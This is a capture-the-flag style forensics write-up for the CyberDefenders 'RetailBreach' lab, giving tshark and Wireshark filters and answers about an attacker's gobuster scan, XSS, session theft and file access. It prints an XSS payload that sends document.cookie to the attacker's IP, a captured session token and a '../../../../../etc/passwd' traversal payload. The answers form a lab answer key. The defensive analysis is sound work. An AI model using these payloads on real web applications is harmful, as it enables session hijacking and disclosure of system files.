# RetailBreach Lab

Q1) In the realm of cybersecurity, identifying the attacker's IP address is pivotal for mapping the attack's scope and strategizing an effective response. What is the IP address associated with the attacker?

<figure><img src="/files/1eQKnj6zBoAqY6SCRkua" alt=""><figcaption></figcaption></figure>

Answer:  111.224.180.128

Q2) Directory brute-forcing tools are known to be used by attackers seeking to uncover hidden paths within web applications. Which tool was employed by the attacker to perform directory brute-forcing?

```bash
tshark -r RetailBreach.pcap -Y "ip.addr==111.224.180.128" -T fields -e http.user_agent | sort | uniq
```

<figure><img src="/files/j8FlcLhZMSZdcpQk5Tyw" alt=""><figcaption></figcaption></figure>

Answer:  gobuster

Q3) Cross-Site Scripting (XSS) allows attackers to inject malicious scripts into web pages viewed by users. Could you specify the XSS payload that was utilized by the attacker to compromise the web application's integrity?

```
ip.addr==111.224.180.128 and http.request.method == "POST"
```

<figure><img src="/files/rWeCbeu8Cm4KP37bKHbu" alt=""><figcaption></figcaption></figure>

```
tshark -r RetailBreach.pcap -Y 'http.request.method == POST' -T fields -e text
```

<figure><img src="/files/zcOdTDMdulQlJRa6pJ1t" alt=""><figcaption></figcaption></figure>

Answer:  fetch('<http://111.224.180.128/>' + document.cookie);

Q4) Pinpointing the exact moment an admin user encounters the injected malicious script is crucial for understanding the timeline of a security breach. Can you provide the UTC timestamp when the admin user first visited the page containing the injected malicious script?

```
http.request.uri contains "review"
```

<figure><img src="/files/njcsVvRVR32n1SoM997c" alt=""><figcaption></figcaption></figure>

Answer:  29-03-2024 12:09:50

Q5) The act of stealing a session token via XSS is a critical security breach, enabling unauthorized access. Can you provide the session token acquired and used by the attacker for unauthorized access?

```
http.request.uri contains "review"
```

<figure><img src="/files/tlexXKVZioV32orTLUwh" alt=""><figcaption></figcaption></figure>

Answer:  lqkctf24s9h9lg67teu8uevn3q

Q6) Identifying which scripts have been exploited is a key step in mitigating vulnerabilities within a web application. What is the name of the script that was exploited by the attacker?

```
http contains "admin"
```

<figure><img src="/files/yESe8BgPZx33dw6TukYp" alt=""><figcaption></figcaption></figure>

Answer:  log\_viewer.php

Q7) Exploiting vulnerabilities to access sensitive system files is a common tactic among attackers. Can you identify the payload that was used by the attacker to gain access to a sensitive system file?

```
http contains "admin"
```

<figure><img src="/files/JSEGV4Nc72IuN7phrNqP" alt=""><figcaption></figcaption></figure>

Answer:  ../../../../../etc/passwd


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://faresbltagy.gitbook.io/footprintinglabs/cyberdefenders/retailbreach-lab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.